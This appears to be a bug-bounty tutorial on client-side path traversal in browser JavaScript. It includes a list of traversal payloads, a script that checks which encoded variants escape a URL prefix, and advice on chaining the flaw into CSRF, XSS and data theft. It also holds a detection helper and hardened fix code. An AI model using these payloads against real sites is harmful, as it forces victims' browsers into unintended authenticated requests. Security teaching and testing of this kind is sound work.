Alright, let's talk about a bug that sounds boring… but can actually be 🔥 very spicy in bug bounty programs — CSPT (Client-Side Path Traversal).

If you've ever thought "Path traversal is just ../../etc/passwd, right?" — yeah… that's server-side. CSPT is its sneaky cousin that lives in the browser and quietly causes chaos 😈

🧠 What is CSPT?

Client-Side Path Traversal (CSPT) happens when JavaScript running in the browser builds a request URL out of user-controlled input (a query parameter, a hash fragment, a route segment) without checking that the input can't contain path traversal sequences.

👉 The server never sees the "../". The browser's URL parser normalises it away before the request leaves, so what arrives at the server is an ordinary-looking request to a different endpoint, sent with the victim's cookies and session attached.

💡 Simple idea:

The app thinks it's requesting:

/api/users/profile

But you trick it into requesting:

/api/admin/secrets

And boom 💥: the victim's browser fires off an authenticated request the developer never intended, and the frontend happily processes whatever comes back.

⚙️ How CSPT Happens

Most modern apps use JavaScript like this:

fetch(`/api/${endpoint}`)

Looks innocent, right? 😇

But if endpoint is user-controlled…

endpoint = "../../admin/secrets"

Now the browser requests:

/api/../../admin/secrets

Which resolves to:

/admin/secrets

🎯 Congrats — you just bypassed the intended API structure.

🪜 Step-by-Step Exploitation

1️⃣ Find a dynamic request

Look for places where JS builds URLs:

fetch(`/api/posts/${postId}`)

2️⃣ Check if input is controllable

Can you control postId via:

  • URL parameters (?postId=<value>)
  • Hash fragments (#/posts/<value>)
  • Route / path segments that the SPA router hands to the request code
  • Input fields
  • Local storage (only interesting if something else lets you write to it)

Example:

https://target.com/?postId=123

3️⃣ Inject traversal payload

Try:

../../admin

So request becomes:

/api/posts/../../admin

Browser resolves it to:

/admin

😏 Sneaky, right?

🔥 Real Example

Original JS:

const file = new URLSearchParams(location.search).get("file");
fetch(`/static/${file}`);

You send:

?file=../../api/admin/users

Browser sends request:

/static/../../api/admin/users

➑️ Final request:

/api/admin/users

🎉 The victim's browser just called an API this code was never meant to reach, with the victim's own session attached. What you get out of it depends on what the page does with the response.
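Here is the whole thing end to end, as an added example that is not code from the original post. It reproduces offline what the browser does with the vulnerable pattern above (URLSearchParams.get() followed by a template literal), using Node's URL class, which implements the same WHATWG parser browsers use, so the pathname it computes is the path the request would really carry. It also goes a step beyond the post's payloads: percent-encoded and double-encoded dots, backslashes, and the case where the input sits in front of a fixed suffix. The origin target.example, the route /api/posts/<id>/comments and the payload table are constructed for the example.

```javascript
// Added example, not code from the original post. Node's URL class implements
// the same WHATWG URL parser browsers use, so url.pathname is the path the
// browser's request would really carry. Origin and routes are assumptions.
const ORIGIN = "https://target.example";

// Step 1 of the vulnerable pattern: URLSearchParams percent-decodes the value
// exactly once before it ever reaches the template literal.
function readParam(search, name) {
  return new URLSearchParams(search).get(name);
}

// Path the browser sends for: fetch(`/static/${file}`)
function staticRequestPath(search) {
  const file = readParam(search, "file");
  return new URL(`/static/${file}`, ORIGIN).pathname;
}

// Same idea with the input wedged between a prefix and a fixed suffix:
// fetch(`/api/posts/${postId}/comments`). A "?" at the end of the payload
// turns "/comments" into a query string, so the suffix no longer pins the path.
function commentsRequest(search) {
  const postId = readParam(search, "postId");
  const url = new URL(`/api/posts/${postId}/comments`, ORIGIN);
  return { pathname: url.pathname, search: url.search };
}

// Constructed payload table: [query string the victim's page receives, path the browser requests]
const STATIC_CASES = [
  ["?file=logo.png", "/static/logo.png"],                               // intended use
  ["?file=../../api/admin/users", "/api/admin/users"],                  // plain traversal
  ["?file=../../../../../api/admin/users", "/api/admin/users"],         // surplus ".." above "/" is discarded, so overshooting is safe
  ["?file=..%2F..%2Fapi/admin/users", "/api/admin/users"],              // %2F decoded by URLSearchParams before concatenation
  ["?file=%2e%2e/%2e%2e/api/admin/users", "/api/admin/users"],          // same reason
  ["?file=%252e%252e/%252e%252e/api/admin/users", "/api/admin/users"],  // decodes to %2e%2e, which the URL parser itself treats as ".."
  ["?file=..\\..\\api/admin/users", "/api/admin/users"],                // backslash is a path separator for http(s) URLs
  ["?file=..%252F..%252Fapi/admin/users", "/static/..%2F..%2Fapi/admin/users"], // stays literal: the browser never normalises %2F
];

// Runs every case and reports whether the request escaped the intended /static/ prefix.
function runStaticCases() {
  return STATIC_CASES.map(([search, expected]) => {
    const actual = staticRequestPath(search);
    return { search, expected, actual, matches: actual === expected, escaped: !actual.startsWith("/static/") };
  });
}

console.table(runStaticCases());
console.log(commentsRequest("?postId=../../admin/users?"));
```

Two things worth noticing in the table: the last row shows that double-encoded slashes do nothing on the client (the browser never normalises %2F; only a server that decodes the path a second time would traverse), and the commentsRequest call shows that a fixed suffix after the input is not a defence, because a trailing "?" (or %23 for "#") in the payload pushes the suffix out of the path.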

😈 Why CSPT is Dangerous

CSPT alone is cool… but chained? Chef's kiss 👨‍🍳💋

🔗 Attack chains:

1. Access Hidden APIs

Endpoints the UI never calls become reachable through the app's own request code. One caveat: the server still authorizes the request against the victim's session, so CSPT on its own does not grant access the victim didn't already have. What it gives you is control over which same-origin endpoint the victim's browser hits, with which method and body.

2. Bypass Frontend Restrictions

Frontend says:

"You are not admin 😑"

But CSPT says:

"I go where I want 😎"

Hiding a route in the UI is not access control. If the backend answers, the request goes through.

3. Steal Sensitive Data

The frontend can read the response (it's same-origin), so whatever it does with the result is your exfil path. If the response is rendered into the page, stored, or used as a URL, you can swap the expected endpoint for one whose output you control (an endpoint that echoes user content, an uploaded file) and turn that trust into XSS or leakage of:

  • user data
  • tokens
  • configs

4. Combine with CORS Misconfig

On its own the traversal stays on the same origin, so CORS doesn't enter into it. It matters when the traversed path reaches an open redirect: fetch follows the redirect off-origin, and if that host answers with a permissive Access-Control-Allow-Origin, the attacker now controls the response the frontend trusts.

5. CSRF-like and SSRF-like behavior

If the vulnerable call is a POST, PUT or DELETE, the traversal turns it into a same-origin CSRF: SameSite cookies and Origin checks don't help because the request genuinely comes from the app, and the frontend attaches its own CSRF token for you. And because the request is sent from the victim's browser, it reaches whatever the victim can reach, including admin-only routes when the victim is an admin.

🧪 Testing Tips (Bug Hunter Mode 🕵️‍♂️)

🔍 Where to look:

  • fetch()
  • axios.get() / axios.post() (and any other HTTP wrapper)
  • XMLHttpRequest.open()
  • Dynamic import()
  • File / image / iframe loaders (img.src, iframe.src, new URL(path, base))
  • Anywhere a router param or a location.search / location.hash value ends up inside a template literal

💥 Payloads to try:

../../              (overshoot freely: extra ".." above "/" is simply dropped)
../../../
..%2f               (decoded once if the value passes through URLSearchParams; the browser itself leaves %2f alone)
..%252f             (only pays off if the server decodes the path a second time)
%2e%2e/             (the URL parser treats %2e%2e as ".." with no decoding needed)
..\                 (backslash is a path separator in http(s) URLs)
../../target?       (when the input sits before a fixed suffix, a trailing "?" or %23 pushes the suffix out of the path)

🧠 Pro Tip:

Always check:

  • Network tab (DevTools) 👀
  • See the actual requests being sent: the path shown there is what the browser sent after normalisation, so it tells you where the traversal really landed
  • Put a breakpoint on fetch / XMLHttpRequest.open in the Sources tab to catch the template literal before it is resolved
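To turn the Network-tab habit into something you can leave running, here is an added helper (not part of the original post): paste it into the DevTools console and it wraps fetch() and XMLHttpRequest.open(), resolves every URL the page's JavaScript builds with the browser's own URL parser, and reports the ones that carry a dot-segment or a backslash, or that resolve outside the API prefix you expect. The window object, the prefix and the callback are parameters; the prefix /api/ in the usage line is an assumed value, not anything site-specific.

```javascript
// Added example, not from the original post: a DevTools console helper.
// It wraps fetch() and XMLHttpRequest.open() so every request the page's
// JavaScript builds is resolved with the browser's own URL parser and
// reported when the raw URL carries a dot-segment or backslash, or when the
// resolved path lands outside the prefix you expect. Nothing is site-specific.

// "..", ".%2e", "%2e." and "%2e%2e" are all dot-segments to the URL parser
// (case-insensitive), but only when they form a whole path segment.
const DOT_SEGMENT = /(^|[\/\\])(\.\.|\.%2e|%2e\.|%2e%2e)(?=[\/\\?#]|$)/i;

// Pure function: classify one request URL relative to the page it was built on.
function analyseRequest(rawUrl, baseHref, expectedPrefix = "") {
  const raw = String(rawUrl);
  const url = new URL(raw, baseHref);
  const reasons = [];
  if (DOT_SEGMENT.test(raw)) reasons.push("dot-segment in raw URL");
  if (raw.includes("\\")) reasons.push("backslash in raw URL");
  if (expectedPrefix && url.origin === new URL(baseHref).origin && !url.pathname.startsWith(expectedPrefix)) {
    reasons.push(`resolved outside ${expectedPrefix}`);
  }
  return { raw, resolved: url.pathname + url.search, suspicious: reasons.length > 0, reasons };
}

// Hook fetch and XHR on the given window-like object; returns an uninstall function.
function installTraversalMonitor(win, { expectedPrefix = "", onHit = (r) => console.warn("[CSPT?]", r) } = {}) {
  const report = (rawUrl) => {
    const result = analyseRequest(rawUrl, win.location.href, expectedPrefix);
    if (result.suspicious) onHit(result);
    return result;
  };
  const origFetch = win.fetch;
  win.fetch = function (input, init) {
    // fetch accepts a string, a URL or a Request; Request exposes .url, the others stringify to the URL
    const raw = input !== null && typeof input === "object" && "url" in input ? input.url : String(input);
    report(raw);
    return origFetch.call(this, input, init);
  };
  const origOpen = win.XMLHttpRequest ? win.XMLHttpRequest.prototype.open : null;
  if (origOpen) {
    win.XMLHttpRequest.prototype.open = function (method, url, ...rest) {
      report(url);
      return origOpen.call(this, method, url, ...rest);
    };
  }
  return () => {
    win.fetch = origFetch;
    if (origOpen) win.XMLHttpRequest.prototype.open = origOpen;
  };
}

// In a browser console (assumed prefix): installTraversalMonitor(window, { expectedPrefix: "/api/" });
```

analyseRequest is kept as a pure function so you can also run it on URLs copied out of the Network tab. It deliberately does not flag ..%2F, because the browser never normalises it; that one only matters against a server that decodes the path a second time.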

🧩 CSPT vs Server-Side Path Traversal

Feature         CSPT                     Server-side
Runs in         Browser                  Server
Impact          API abuse                File access
Visibility      Easy (DevTools)          Hidden
Exploit style   URL manipulation         File system traversal

🛡️ How to Fix (for devs lurking 👀)

❌ Bad:

fetch(`/api/${userInput}`)

✅ Good:

  • Validate input strictly: an ID should match something like ^[0-9]+$; reject anything containing "/", "\", "." or "%"
  • Use allowlists:
const allowed = ["profile", "posts"];        // the only endpoints this code may call
if (!allowed.includes(userInput)) return;    // rejects "../" and friends before they reach the URL
fetch(`/api/${userInput}`);                  // safe: userInput is now one of the literals above
  • Avoid direct concatenation: build the URL with new URL() and check that the resolved pathname still starts with the prefix you meant
  • Don't rely on encodeURIComponent alone: it stops the browser from traversing (%2F is not a separator to the URL parser), but a server that decodes %2F before routing could still be fooled
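Putting those rules together, here is a hardened replacement for fetch(`/api/posts/${postId}`), added here as an example rather than taken from the post: a strict allowlist on the raw input, encodeURIComponent as a second layer, and a check on the resolved URL as a third. The origin target.example, the route /api/posts/ and the ID pattern are assumptions for the example.

```javascript
// Added example, not the post's code: a hardened replacement for
// fetch(`/api/posts/${postId}`). ORIGIN and ROUTE are assumed values.
const ORIGIN = "https://target.example";
const ROUTE = "/api/posts/";

// Layer 1: the raw input must look like an ID. No "/", "\", "." or "%" at all,
// so neither "../" nor any encoded variant of it can even be expressed.
const SAFE_SEGMENT = /^[A-Za-z0-9_-]{1,64}$/;

// Layer 3 on its own: resolve with the real URL parser and check where the
// request actually lands. Catches "..", "%2e%2e" and "\" traversal, but not
// "..%2F", which the browser leaves alone and only a double-decoding server
// would traverse. That gap is why the allowlist in layer 1 is not optional.
function landsUnder(prefix, rawSegment) {
  const url = new URL(prefix + rawSegment, ORIGIN);
  if (url.origin !== ORIGIN || !url.pathname.startsWith(prefix)) return false;
  const rest = url.pathname.slice(prefix.length);
  return rest !== "" && !rest.includes("/") && url.search === "" && url.hash === "";
}

// All three layers: allowlist, encode, then verify the resolved URL.
// Returns a URL object, or null if the input must be rejected.
function buildPostUrl(postId) {
  const id = String(postId);
  if (!SAFE_SEGMENT.test(id)) return null;        // layer 1
  const encoded = encodeURIComponent(id);          // layer 2: defence in depth, never the only control
  if (!landsUnder(ROUTE, encoded)) return null;    // layer 3
  return new URL(ROUTE + encoded, ORIGIN);
}

// Drop-in for the vulnerable call; fetchImpl is injectable so it can be exercised offline.
function safeFetchPost(postId, fetchImpl = globalThis.fetch) {
  const url = buildPostUrl(postId);
  if (url === null) throw new Error("rejected post id");
  return fetchImpl(url.href, { credentials: "same-origin" });
}
```

landsUnder is exposed on its own to show the limits of the post-resolution check: it stops ../, %2e%2e and backslash traversal, but lets ..%2F through because the browser never normalises it; the allowlist is what closes that gap against servers that decode a second time.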

😂 Final Thoughts

CSPT is like:

"Frontend said no… but browser said yes 😏"

It's often overlooked because:

  • It's not "classic"
  • It lives in JavaScript
  • People underestimate frontend bugs

But in bug bounty… 👉 We don't ignore weird bugs. We weaponize them 😎